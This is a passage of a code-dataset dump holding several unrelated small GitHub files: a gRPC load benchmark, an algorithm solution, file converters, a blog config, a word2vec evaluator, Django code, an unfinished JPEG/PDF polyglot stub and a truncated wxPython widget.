_save_reading_worker_grpc(num_requests: int, wid: int):\n logger = log_factory(\n log_name=f\"WID_{wid:03d}\",\n log_level=logging.INFO\n )\n client = SensorClient()\n timer = StopWatch(auto_start=True)\n\n for _ in range(num_requests):\n client.save_new_reading(\n sensor_id=\"S1\",\n reading_location_id=\"L1\",\n reading_value=42,\n read_at=datetime.utcnow()\n )\n logger.info(f\"## Worker: {wid} finished! Elapsed time: {timer.end()}\")\n\n\ndef _read_reading_worker_grpc(num_requests: int, wid: int, **kwargs):\n logger = log_factory(\n log_name=f\"WID_{wid:03d}\",\n log_level=logging.INFO\n )\n client = SensorClient()\n timer = StopWatch(auto_start=True)\n\n for _ in range(num_requests):\n client.get_readings(limit=kwargs[\"limit\"])\n logger.info(f\"## Worker: {wid} finished! Elapsed time: {timer.end()}\")\n\n\ndef _read_reading_by_id_worker_grpc(num_requests: int, wid: int, **kwargs):\n logger = log_factory(\n log_name=f\"WID_{wid:03d}\",\n log_level=logging.INFO\n )\n client = SensorClient()\n timer = StopWatch(auto_start=True)\n\n for _ in range(num_requests):\n client.get_reading(reading_id=kwargs[\"reading_id\"])\n\n logger.info(f\"## Worker: {wid} finished! Elapsed time: {timer.end()}\")\n\n\ndef benchmark_save_reading(num_workers: int, msgs_per_worker: int, worker, **kwargs):\n cpus = multiprocessing.cpu_count()\n timer = StopWatch(auto_start=True)\n\n print(f\"CPUs available: {cpus}\")\n print(f\"Starting benchmark at: {timer.start_datetime}\")\n\n pool = multiprocessing.Pool()\n for wid in range(num_workers):\n pool.apply_async(worker, args=(msgs_per_worker, wid), kwds=kwargs)\n\n print(\"Now waiting...\")\n pool.close()\n pool.join()\n\n elapsed_time = timer.end()\n its = float(msgs_per_worker * num_workers) / float(timer.elapsed(raw=True).total_seconds())\n print(f\"All done! Elapsed time: {elapsed_time}. Requests/Sec: {its}\")\n\n\nif __name__ == '__main__':\n benchmark_save_reading(\n num_workers=1000,\n msgs_per_worker=100,\n worker=_read_reading_by_id_worker_grpc,\n reading_id=\"d764fa3e-753a-4801-9c77-9b9baa1d8bb2\"\n )\n","repo_name":"brenordv/grpc-env-sensors","sub_path":"run_client_benchmark.py","file_name":"run_client_benchmark.py","file_ext":"py","file_size_in_byte":2474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"30098559869","text":"# 빗물 210929\n\"\"\" \n* 기둥이 존재하는지 파악하는 알고리즘\n1. 왼쪽 -> 오른쪽 지나면서 다음 인덱스의 높이가 더 낮은곳이 있다면 그곳이 기둥 후보, 마지막 인덱스의 경우 무조건 후보에 넣어주자\n2. 오른쪽 -> 왼쪽 지나면서 1번과 마찬가지로 더 낮은곳을 만나는 기둥 후보를 담아두자.\n3. L->R, R->L 후보를 set를 사용해서 기둥들을 잡아준 다음\n4. 기둥들 사이의 숫자들을 기둥만큼 채워주면 물의 양을 계산 할 수 있다. 물이 쌓일수 있는 최대 높이는 min(좌, 우 높이)\n\n입력 \nH W 주어진다.\n블록이 쌓인 높이인 0이상 H이하 정수가 주어진다.\n\n* 문제 알고리즘\n1. 만약.. 기둥이 0개 또는 1개만 존재한다면 물을 담을 수 없다.\n2. 기둥을 찾는다. 2개 이상의 기둥이 존재해야 하고 기둥은 전부 리스트에 담아준다.\n2-1. 1번의 경우와 같지만 기둥이 두개 존재하는 경우, 두개의 기둥이 바로 옆으로 붙어있는 케이스는 물은 담을 수 없다. 이를 후보를 이용해서 겹치지 않는 형태임을 이용해서 기둥이 존재하지 않는것 처럼 처리할 수 있다.\n예) 0230, 0220\n# h3,w6 / 2 1 0 0 2 1 -> p1은 0,1,4,5 p2는 4, 0이 담겨야한다.\n# h3,w6 / 0 0 2 2 3 0 -> p1은 4,5 p2는 4, 2, 0 => 기둥이 4 한개만 생성된다.\n3. 두개 이상의 기둥이 존재해야 다음 단계로 갈 수 있고 아닐경우 0 return한다. \n물이 담긴다면 두 기둥 중 더 낮은 높이가 물이 담길수 있는 최고 높이\n1번과 3번에 기둥이 존재한다면 2번에서 현재 높이와 최소 기둥높이 사이에 물을 가득 채운 값을 담으면 된다.\n# 4 8 / 3 2 1 2 1 0 3 2 -> 답 9, 출력 4\n중간의 기둥이 좌 우 보다 낮을경우 무시해야 한다.. 그런데 이게 방법이 어렵다.\n\"\"\"\n\n# 1, 내가 사용한 알고리즘 (반례: 중간에 기둥이 낮은게 존재할 경우 무시해야 한다)\n'''\nh, w = map(int, input().split())\narray = list(map(int, input().split()))\n\n# 1. 기둥이 한개 또는 0개 존재\nzeros = array.count(0) \nif zeros == w or zeros == w-1:\n print(0)\n exit()\n\n# 2. 기둥을 찾는 알고리즘 시작\np1, p2 = [], []\nfor i in range(w): # l->r, p1\n if i != w-1 and array[i] > array[i+1]:\n p1.append(i)\n if i == w-1: # 끝은 무조건 포함시키는게 예외의 케이스를 만들지 않는다.\n p1.append(i)\nfor i in range(w-1,-1,-1): # r->l, p2\n if i != 0 and array[i] > array[i-1]:\n p2.append(i)\n if i == 0:\n p2.append(i)\np = list(set(p1) & set(p2))\n\n# 3. 기둥의 개수가 2개 이상이여야 계산이 가능\nif len(p) < 2:\n print(0)\nelse: # 물이 담긴 양 계산한다.\n # zip 함수로 (좌,우) 기둥을 묶어준 다음 활용하자\n # 4 8, 3 1 2 3 4 1 1 2 -> 기둥이 3개 생기는 케이스\n water = 0\n for i, j in list(zip(p[:], p[1:])):\n height = min(array[i], array[j])\n for k in range(i+1, j):\n water += height - array[k]\n print(water) \n'''\n \n# 2, 인터넷 답-투포인터를 응용한 방식\nh, w = map(int, input().split())\narray = list(map(int, input().split()))\n\nl, r = 0, w-1\nmax_l, max_r = array[l], array[r]\n\nwater = 0\n\nwhile l < r:\n max_l = max(max_l, array[l])\n max_r = max(max_r, array[r])\n if max_r >= max_l:\n water += max_l - array[l]\n l += 1\n else:\n water += max_r - array[r]\n r -= 1\nprint(water)","repo_name":"FrancisJeon/Baekjoon-python","sub_path":"BOJ_14719.py","file_name":"BOJ_14719.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"35595832956","text":"import os\nimport json, pickle\n\nclass File_Manager:\n ALLOWED_EXTENSIONS = (\n 'json',\n 'csv',\n 'pickle'\n )\n\n def __init__(self, file, file_to_write, path=\"\", *args):\n self.file = file\n self.path = path\n self.filetype = self.set_filetype(self.file)\n self.is_path_exist = self.validate_path()\n self.mode_from_read = self.set_mode_from_read()\n self.to_read = open(self.get_filepath(), self.mode_from_read)\n self.file_to_write = file_to_write\n self.filetype_to_write = self.set_filetype(self.file_to_write)\n self.to_change = args\n self.validated = self.validate()\n self.data = self.set_data()\n self.changes = self.lst_of_changes()\n self.mode_to_write = self.set_mode_to_write()\n self.to_write = open(self.file_to_write, self.mode_to_write)\n self.changed_file = self.change_file()\n self.changed = self.save_file_to()\n\n def validate(self):\n if self.filetype not in self.ALLOWED_EXTENSIONS:\n print(\"Nieobslugiwany format\")\n return False\n return True\n\n def validate_path(self):\n if not os.path.exists(self.file):\n raise FileNotFoundError(f\"Lista plików w podanej lokalizacji: {os.listdir(os.curdir)}\")\n \n def lst_to_change(self, *args):\n lst = [x for x in args][0]\n return lst\n\n def set_filetype(self, f):\n return f.split(\".\")[-1]\n\n def get_filepath(self):\n if self.path:\n return f'{self.path}\\{self.file}'\n return self.file\n\n def set_mode_from_read(self):\n if self.filetype == \"csv\":\n return 'r'\n elif self.filetype == \"json\":\n return 'r'\n elif self.filetype == \"pickle\":\n return 'rb'\n\n def show_file(self):\n print(self.data)\n\n def lst_of_changes(self):\n lst_to_change = []\n for el in self.to_change:\n for ell in el:\n b = ell.split(\",\")\n c = [int(x) for x in b[:-1]]\n d = c[0], c[1], b[2]\n lst_to_change.append(d)\n return lst_to_change\n\n def change_file(self):\n changed_file = self.data\n changed_file[self.changes[0][0]][self.changes[0][1]] = self.changes[0][2]\n return changed_file\n\n def set_data(self):\n with self.to_read: # to with open ma być przekazane jako do readline\n if hasattr(self, f'get_{self.filetype}_data'):\n return getattr(self, f'get_{self.filetype}_data')()\n print(f\"Konieczna implementacja metody: get_{self.filetype}_data na {self}\")\n return []\n\n def from_where_save_file_to(self):\n if self.filetype_to_write == \"csv\":\n return Csv_Manager\n elif self.filetype_to_write == \"json\":\n return Json_Manager\n elif self.filetype_to_write == \"pickle\":\n return Pickle_Manager\n else:\n raise TypeError(\"Nie ma metody obsługującej ten format.\")\n \n def set_mode_to_write(self):\n if self.filetype_to_write == \"csv\":\n return 'w'\n elif self.filetype_to_write == \"json\":\n return 'w'\n elif self.filetype_to_write == \"pickle\":\n return 'wb'\n\n def save_file_to(self):\n with self.to_write:\n if hasattr(self, f'get_{self.filetype_to_write}_data'):\n return getattr(self, f'save_{self.filetype_to_write}_data')()\n else:\n getattr(self.from_where_save_file_to(),f'save_{self.filetype_to_write}_data')(self)\n print(f\"Konieczna implementacja metody: save_{self.filetype}_data na {self}\")\n return []\n\n\nclass Csv_Manager(File_Manager):\n def get_csv_data(self):\n data = []\n for line in self.to_read.readlines():\n data.append(line.replace(\"\\n\", \"\").split(\";\"))\n return data\n\n def save_csv_data(cls):\n for line in cls.changed_file:\n cls.to_write.write(str(line[0]) + \";\" + str(line[1]) + \"\\n\") \n\nclass Json_Manager(File_Manager):\n def get_json_data(self):\n data = json.loads(self.to_read.read())\n return [[key, value] for key, value in data.items()]\n\n def save_json_data(cls):\n dict_of_changed_file=dict(cls.changed_file)\n json.dump(dict_of_changed_file, cls.to_write)\n\nclass Pickle_Manager(File_Manager):\n def get_pickle_data(self):\n data = pickle.load(self.to_read)\n return [[key, value] for key, value in data.items()]\n\n def save_pickle_data(cls):\n dict_of_changed_file=dict(cls.changed_file)\n print(type(cls.to_write))\n pickle.dump(dict_of_changed_file, cls.to_write)\n\nclass Manager(File_Manager): \n def __new__(cls, file, file_to_write, path, *args, format=\"\"):\n if format==\"csv\":\n return Csv_Manager(file, file_to_write, path, *args)\n elif format==\"json\":\n return Json_Manager(file, file_to_write, path, *args)\n elif format==\"pickle\":\n return Pickle_Manager(file, file_to_write, path, *args)\n print(\"Nie ma metody obsuługującej odczyt danych z tego formatu.\")","repo_name":"Ewelina179/Projects_Future_Collars_Bootcamp","sub_path":"f_manager/manager/file_manager.py","file_name":"file_manager.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"2094823126","text":"import requests, datetime, api_token\ndef weather(URL,time,api_key,city):\n url = URL+time+api_key+city; time = requests.get(url).json()['dt']\n print(datetime.datetime.now().strftime('%H:%M:%S\\n----------'))\n print(requests.get(url).json()['weather'][0]['main'])\n data = lambda clas, name: requests.get(url).json()[clas][name]\n temp = data('main', 'temp'); humidity = data('main', 'humidity')\n print(\"Temp: {0:.2f}\".format(temp- 273,15)+u\"\\u00B0\"+'C\\n'+'humidity: '+str(humidity)+\"%\")\n\nweather(URL = 'http://api.openweathermap.org/data/2.5/' ,\\\n time = 'weather' ,\\\n api_key = '?appid=' + f'{api_token.token}' ,\\\n city = '&q=' + 'Moscow' )\n","repo_name":"AlanLatte/MyPrograms","sub_path":"python/projects/Other/weather/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"40093675","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\nfrom bywyd import prif\n\nAUTHOR = u'Wil Ifan'\nSITENAME = u'The Library of Babel'\nSITESUBTITLE = 'LEAGUES OF SENSELESS CACOPHONIES'\nSITEURL = 'https://oki.nohost.me/babel'\n\nSTATIC_PATHS = ['images', 'extra',]\n#EXTRA_PATH_METADATA = {\n# 'extra/favicon.ico': {'path': 'favicon.ico'}, # Haven't set this yet.\n#}\nFAVICON = \"{{ PATH }}/extra/favicon.ico\"\n\n# To publish an article, add Status: published to the metadata.\nDEFAULT_METADATA = {\n 'status': 'draft',\n}\n\nABOUT = 'Rhydd i bawb ei farn, ac i bob barn ei llafar.'\n\n# Extensions for Markdown. codehilite's 'linenums': 'True' causes all sorts of issues in code blocks.\n#MARKDOWN = {\n# 'extension_configs': {\n# 'markdown.extensions.codehilite': {'css_class': 'highlight'},\n# 'markdown.extensions.extra': {},\n# 'markdown.extensions.meta': {},\n# },\n# 'output_format': 'html5',\n#}\n\n# Defines where Pelican looks for its articles.\nPATH = 'content'\n\n# The theme folder must be in Pelican's root folder (the same one as the content folder).\nTHEME = 'future-imperfect'\n\nTIMEZONE = 'Europe/London'\n\nDEFAULT_LANG = u'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'https://getpelican.com/'),\n ('Python.org', 'https://www.python.org/'),\n ('Jinja2', 'https://palletsprojects.com/p/jinja/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('You can add links in your config file', '#'),\n ('Another social link', '#'),)\n\n# Icon names (second item in tuple) use Font Awesome nomenclature.\nCONTACTS = [\n (\"Twitter\", \"twitter\", \"https://twitter.com\"),\n (\"Facebook\", \"facebook-f\", \"https://facebook.com\"),\n (\"Instagram\", \"instagram\", \"https://www.instagram.com\"),\n (\"Email\", \"envelope\", \"#\"),\n]\n\nDEFAULT_PAGINATION = 3\nSUMMARY_MAX_LENGTH = 20\nSUMMARY_END_SUFFIX = \"...\"\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n\n# Enhanced typographical features, e.g. correctly formatted em-dashes.\nTYPOGRIFY = True\nTYPOGRIFY_DASHES = 'oldschool_inverted'\n\nMATH_JAX = {\n \"responsive\": True,\n}\n\nJINJA_FILTERS = {\n \"bywyd\": prif,\n}\n\nPHRASES = [ # For use in the `About` section of base.html\n 'Rhydd i bawb ei farn, ac i bob barn ei llafar.',\n 'The universe is trying to turn itself into iron.',\n 'Ydy dy dŷ du di o dan dy dô du di?',\n 'Cofiwch Dryweryn.',\n 'The mediator between the head and the hands must be the heart.',\n]\n","repo_name":"twrchtrwyth/pelican","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"43316216352","text":"import numpy as np\nfrom numpy import linalg as la\nfrom utils import dictionary\n\ndef read_questions():\n questions = []\n with open(\"questions-words.txt\", \"r\") as fi:\n for line in fi:\n if line.startswith(':'):\n continue\n words = line.strip().lower().split(' ')\n ids = [dictionary.get(word) for word in words]\n if not all(ids):\n continue\n questions.append(ids)\n return np.array(questions)\n\n# embedding: [vocabulary_size, embedding_size]\ndef predict(embedding, ws):\n # normalize each embedding vector\n # so that cosine distance can be computed easier\n nemb = embedding / np.maximum(la.norm(embedding, axis=1), 1e-12).reshape([embedding.shape[0],1])\n a = nemb[ws[0]]\n b = nemb[ws[1]]\n c = nemb[ws[2]]\n d = b - a + c\n dis = np.matmul(d, np.transpose(nemb))\n return np.argpartition(dis, -4)[-4:]\n\ndef eval(embedding, questions):\n correct = 0\n total = questions.shape[0]\n for ind in range(total):\n print('\\r {}/{}'.format(ind, total), end = '\\r')\n qu = questions[ind]\n ps = predict(embedding, qu[:3])\n for w in ps:\n if w == qu[3]:\n correct += 1\n break\n print(\"Eval %4d/%d accuracy = %4.1f%%\" % (correct, total, correct * 100.0 / total))","repo_name":"pierric/word2vec","sub_path":"eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"6437134254","text":"# list sort written by Ervin Mamutov - github.com/imervin\n\nimport random\n\n# mergeList function takes 2 lists as parameters\ndef mergeLists(list1, list2):\n # Sorts the two lists\n list1.sort()\n list2.sort()\n\n #Print out the two lists that have been passed in\n print(\"List One:\",list1,\"\\nList Two:\",list2)\n \n # Concats the two lists above to create a new list\n list3 = list1+list2\n\n # Sorts the new list\n list3.sort()\n\n # Prints the new list\n print(list3)\n\n# Pass in two random lists into the function above\nmergeLists([random.randint(1, 100) for i in range(10)], [random.randint(1, 100) for i in range(10)] )\n","repo_name":"ImErvin/Python-Problem-Sheet","sub_path":"list-sort.py","file_name":"list-sort.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"17816116620","text":"from django.shortcuts import render, get_object_or_404\r\nfrom django.http import HttpResponse\r\nfrom .models import Product\r\nfrom django.template import loader\r\nfrom django.shortcuts import render\r\n\r\n# Create your views here.\r\n\r\ndef index(request):\r\n product_list = Product.objects.all()\r\n context = {\r\n 'product_list': product_list,\r\n }\r\n return render(request, 'storeFront.html', context)\r\n\r\n\r\ndef product(request, id):\r\n show_product = get_object_or_404(Product, pk=id)\r\n context = {\r\n 'product': show_product,\r\n\r\n }\r\n return render(request, 'productPage.html', context)\r\n","repo_name":"hbc0723/PrideStore","sub_path":"testStore/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"74000761823","text":"import click\n\nclass jpeg:\n def __init__(self, fileName):\n with open(fileName, \"rb\") as data:\n jpg = bytearray(data.read())\n i = jpg.index(b\"\\xdb\")\n self.jfif = jpg[0:i-1]\n self.imageData = jpg[i:]\n\n @property\n def jfif(self):\n return self.__jfif\n\n @jfif.setter\n def jfif(self, jfif):\n self.__jfif = jfif\n\n @property\n def imageData(self):\n return self.__imageData\n\n @imageData.setter\n def imageData(self, imageData):\n self.__imageData = imageData\n\nclass jfif:\n def __init__(self, data):\n pass\n\nclass pdf:\n def __init__(self, fileName):\n with open(fileName, \"rb\") as data:\n pdf = bytearray(data.read())\n i = 0\n while i <= len(pdf):\n if chr(pdf[i]) == 'o' and chr(pdf[i+1]) == 'b' and chr(pdf[i+2]) == 'j':\n self.pdfHeader = pdf[:i-1]\n self.pdfData = pdf[i:]\n break\n i += 1\n\n @property\n def pdfHeader(self):\n return self.__pdfHeader\n\n @pdfHeader.setter\n def pdfHeader(self, pdfHeader):\n self.__pdfHeader = pdfHeader\n\n @property\n def pdfData(self):\n return self.__pdfData\n\n @pdfData.setter\n def pdfData(self, pdfData):\n self.__pdfData = pdfData\n\ndef jpgInPdf(jpg, pdf):\n output = bytearray()\n head = jpg.jfif\n tail = \"\"\n dummyObject = bytearray()\n head[2] = ord('\\x00')\n head[3] = ord('\\x00')\n output.extend(head)\n with open(\"out.pdf\", \"wb\") as outputFile:\n pass\n\nwith open(\"vapor.jpg\", \"rb\") as jpg:\n pdf = pdf(\"koc-do-you-want-vaporwave.pdf\")\n jpg = jpeg(\"vapor.jpg\") \n jpgInPdf(jpg, pdf)\n\n","repo_name":"Zrocket/pylyglot","sub_path":"pylyglot.py","file_name":"pylyglot.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"12175259340","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = \"Nicolas Götzfried\"\n\"\"\"\nData processing script for Choice-Based Conjoint Analysis conducted via QuestionPro.\nThe script validate respondents based on three holdouts. Holdout choice set 1 and 3 have to be identical.\nThe script transforms the QuestionPro wide format into long format. It changes the following:\n1. Mapping attributes to levels with dummy variables\n2. Adding a none option for every conjoint tasks\n3. calculating a time variable, which is necessary for Cox regression\n4. enables a priori segmentation via \"respondent list\"\n\"\"\"\n\nimport pandas as pd # third-party library\nimport numpy as np # third-party library\n\n\ndef validate_holdouts():\n is_valid = [] # return list of valid respondents\n for respondent in holdout_respondents:\n # Iterating through respondentsIDs\n # The dataset size various from 0 to 3, depending on how many times a respondent selected 'none'\n # QuestionPro doesnt export the row, if 'none is selected'\n\n # dataframe containing selected holdout profiles\n selected_profiles = holdouts.loc[\n (holdouts[\"Response ID\"] == respondent) & (holdouts[\"Selected\"] == 1)]\n\n size = len(selected_profiles) # size indicates how many times 'none option' was selected\n\n if size == 1: # size 1 => respondent selected 2 times 'none'\n if (selected_profiles.iloc[0][\"Concept ID\"] == 3) or (selected_profiles.iloc[0][\"Concept ID\"]) == 4:\n is_valid.append(respondent)\n else:\n if size == 2: # size 2 => respondent selected 1 time 'none': e.g. concept 1 == concept 5\n if (selected_profiles.iloc[0][\"Concept ID\"] + 4) == selected_profiles.iloc[1][\"Concept ID\"]:\n is_valid.append(respondent)\n else: # size 3 => no none option: same as size 2\n if (selected_profiles.iloc[0][\"Concept ID\"] + 4) == selected_profiles.iloc[2][\"Concept ID\"]:\n is_valid.append(respondent)\n return is_valid # list of valid respondent ids\n\n\ndef to_long_format(wide):\n rows_list = []\n for i in range(0, len(wide)):\n # QuestionPro does not export a third row for concept 3 none\n # second rows are the interesting ones, if more concepts are displayed\n # to the user \"(i-1) % 2 == 0\" has to be updated\n # Creating a List of Rows -> transforming from attributes to levels + adding none option\n\n # is it the second concept? if true get row 1 and row 2 , row 3 is none option\n if (i - 1) % 2 == 0:\n row1 = wide.iloc[i - 1]\n row2 = wide.iloc[i]\n # creating 3 rows for the long dataset and adding those to the rows_list\n row1_long = []\n row2_long = []\n row3_long = []\n # adding the mapping from wide format (1-4) to binary long format (0,1)\n choices = {1: [1, 0, 0, 0], 2: [0, 1, 0, 0], 3: [0, 0, 1, 0], 4: [0, 0, 0, 1]} # hashmap-> wide->long\n for j in range(len(row2)):\n # Respondent\n if j == 0:\n row1_long.append(row1[j])\n row2_long.append(row2[j])\n row3_long.append(row2[j])\n # Task ID (cumulative)\n elif j == 1:\n conjoint_task = int(((i-1)/2)+1)\n row1_long.append(conjoint_task)\n row2_long.append(conjoint_task)\n row3_long.append(conjoint_task)\n # Concept ID\n elif j == 2:\n row1_long.append(row1[j])\n row2_long.append(row2[j])\n row3_long.append(3)\n # goals 3, tracking 4, reinforcement 5, self-efficay 6, social support 7, provider 8\n elif 3 <= j <= 8:\n # to list() is mandatory, because append works only for lists not numpy arrays\n row1_long = np.concatenate((row1_long, choices.get(row1[j])), axis=None).tolist()\n row2_long = np.concatenate((row2_long, choices.get(row2[j])), axis=None).tolist()\n row3_long = np.concatenate((row3_long, [0, 0, 0, 0]), axis=None).tolist()\n # none option level\n elif j == 9:\n row1_long.append(0)\n row2_long.append(0)\n row3_long.append(1)\n # selected, if case ow1[j] == 0 & row2[j] == 0: none option is selected\n elif j == 10:\n # If concept 1 and concept 2 is not selected, concept 3 'none' is selected\n if row1[j] == 0 and row2[j] == 0:\n row1_long.append(0)\n row2_long.append(0)\n row3_long.append(1)\n else:\n row1_long.append(row1[j])\n row2_long.append(row2[j])\n row3_long.append(0)\n rows_list.append(row1_long)\n rows_list.append(row2_long)\n rows_list.append(row3_long)\n return rows_list\n\n\nif __name__ == '__main__':\n # reading \"Full Profile\" for all Respondents, 7 conjoint tasks each respondent\n full_profile = pd.read_csv(\"cbca_profiles.CSV\", delimiter=\";\")\n # reading holdouts, 3 holdout tasks each respondent\n holdouts = pd.read_csv(\"cbca_holdouts.CSV\", delimiter=\";\")\n # reading a list of respondents im interested in (filtering done by spss)\n conditionCSV = \"seg_adoption_nonuser.csv\"\n interested_respondents = pd.read_csv(conditionCSV)\n # addtional Information for CBCA\n # tasks = 7\n # concepts = 2\n\n # level of attributrs\n goals_level = [\"weekly goals\", \"menu planning exercise\", \"set amount of calorie intake\",\n \"daily habit challenge per week\"]\n tracking_level = [\"tracking via food-database\", \"tracking via recipes\", \"Import recipes from websites\",\n \"track via photo\"]\n reinforcement_level = [\"life-score\", \"surprise challenges\", \"tracking reminder\", \"food displayed in color\"]\n selfefficay_level = [\"food diary\", \"progress graph of intake\", \"confidence scale\", \"feedback on goal progress\"]\n socialsupport_level = [\"interaction with Family Friends Peers\", \"invite person to track users food\",\n \"role models performing target behavior\", \"Sharing achievements\"]\n provider_level = [\"non profit organization\", \"well known company\", \"start-up\", \"insurance company\"]\n\n # attributes in English (questionPro export is german(default language)) \"Ziele\" -> \"goals\"\n renamed_columns = ['Response ID', 'Task ID', 'Concept ID', 'goals', 'tracking', 'reinforcement',\n 'self-efficay', 'social support', 'provider', 'Parts Worth', 'selected',\n 'Standard Deviation', 'Confidence Interval Range 1', 'Confidence Interval Range 2']\n\n # renaming attributes from German to English\n full_profile.columns = renamed_columns\n\n # adding a new level \"none\" at index 10 to the dataset (filled with dummy value -1)\n full_profile[\"none\"] = -1\n columns = list(full_profile.columns)\n full_profile = full_profile[columns[:9] + [columns[-1]] + [columns[10]]]\n\n # adding \"time\" to the end of the dataset with dummy values -1\n full_profile[\"time\"] = -1\n\n all_respondents = pd.unique(full_profile[\"Response ID\"])\n holdout_respondents = pd.unique(holdouts[\"Response ID\"])\n\n # symmetric difference for respondents which selected 3 times the none option (These are valid respondents)\n always_none_respondents = list(set(all_respondents) - set(holdout_respondents))\n\n # getting valid respondents (checking holdouts) (list of valid respondents)\n valid_respondents = validate_holdouts()\n\n # Adding User who picked 3 times none in the holdouts, they are not part of the holdouts\n # dataset, because QuestionPro does not export the none option rows\n for resp in always_none_respondents:\n valid_respondents.append(resp)\n\n respondents_conditioned = np.intersect1d(valid_respondents, interested_respondents)\n valid_profiles = full_profile[full_profile['Response ID'].isin(respondents_conditioned)]\n\n # final dataset header in long format (including levels not attributes)\n final_arr = np.concatenate((['Response ID', 'Task ID', 'Concept ID'], goals_level, tracking_level,\n reinforcement_level, selfefficay_level, socialsupport_level,\n provider_level, ['none', 'selected']), axis=None).tolist()\n # getting Data into long format, adding None options\n long_format = to_long_format(valid_profiles)\n df_final = pd.DataFrame(long_format, columns=final_arr)\n\n # adding time variable for Cox Regression (Backhaus et.al) (-(selected-2))\n df_final[\"time\"] = (-(df_final[\"selected\"] - 2))\n\n # saving Data\n df_final.to_csv(conditionCSV[:-4] + \"_long_clean.csv\", sep=\";\", index=False)\n\n # Summary for complete Dataset not on filtered one\n print(\"Number of respondents: \" + str(len(all_respondents)))\n print(\"Number of consistent respondents: \" + str(len(valid_respondents)))\n print(\"Number of respondents after segmentation: \" + str(len(pd.unique(valid_profiles[\"Response ID\"]))))\n print(\"ValidationRate = \" + str(round(((len(valid_respondents) / len(all_respondents)) * 100), 2))\n + \"% of all respondents are consistent in their holdout selection\")\n","repo_name":"sampler123/BA_data_pipeline","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29137285678","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('login', '0005_auto_20151130_1956'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='post',\n name='subject',\n field=models.CharField(max_length=15, choices=[(b'Datastructure', b'Datastructure'), (b'WebProgramming', b'WebProgramming'), (b'General', b'General'), (b'Java', b'Java'), (b'DBMS', b'DBMS')]),\n ),\n ]\n","repo_name":"msandeepa/Discussion-forum","sub_path":"login/migrations/0006_auto_20151201_1003.py","file_name":"0006_auto_20151201_1003.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"24979094287","text":"import wx\n\nfrom pdesign.widgets import const, BOTTOM, CENTER, LEFT, ALL, EXPAND\nfrom pdesign.widgets import Application, MainWindow, Entry\nfrom pdesign.widgets import HPanel, VPanel\nfrom pdesign.widgets.basic import SpinButton, SizedPanel\nfrom pdesign.widgets.generic import RangeDataWidget\n\nclass FloatSpin(wx.Panel, RangeDataWidget):\n\n\tentry = None\n\tsb = None\n\n\tflag = True\n\tvalue = 0.0\n\trange_val = (0.0, 1.0)\n\tstep = 0.01\n\tdigits = 2\n\tcallback = None\n\n\tdef __init__(self, parent, value=0.0, range_val=(0.0, 1.0), step=0.01,\n\t\t\t\tdigits=2, size=const.DEF_SIZE, width=0, spin_overlay=True,\n\t\t\t\tonchange=None, check_focus=True):\n\n\t\tself.callback = onchange\n\t\tif const.is_mac(): spin_overlay = False\n\n\t\twx.Panel.__init__(self, parent)\n\t\t#self.SetBackgroundColour(wx.RED)\n\t\tif spin_overlay:\n\t\t\tif const.is_gtk():\n\t\t\t\tself.entry = Entry(self, '', size=size, width=width)#,\n\t\t\t\t\t\t#onchange=self._check_entry, onenter=self._entry_enter)\n\t\t\t\tsize = (-1, self.entry.GetSize()[1])\n\t\t\t\tself.sb = SpinButton(self, size=size)\n\t\t\t\tw_pos = self.entry.GetSize()[0] - 5\n\t\t\t\tself.sb.SetPosition((w_pos, -1))\n\t\t\t\tline = HPanel(self)\n\t\t\t\tline.SetSize((1, self.sb.GetSize()[1] - 1))\n\t\t\t\tline.set_bg(const.UI_COLORS['dark_shadow'])\n\t\t\t\tline.SetPosition((w_pos - 1, -1))\n\t\t\telif const.is_msw():\n\t\t\t\tself.entry = Entry(self, '', size=size, width=width)#,\n\t\t\t\t\t\t#onchange=self._check_entry, onenter=self._entry_enter)\n\t\t\t\tsize = (-1, self.entry.GetSize()[1] - 1)\n\t\t\t\tself.sb = SpinButton(self.entry, size=size)\n\t\t\t\tw_pos = self.entry.GetSize()[0] - self.sb.GetSize()[0] - 2\n\t\t\t\tself.sb.SetPosition((w_pos, -2))\n\t\telse:\n\t\t\tself.box = 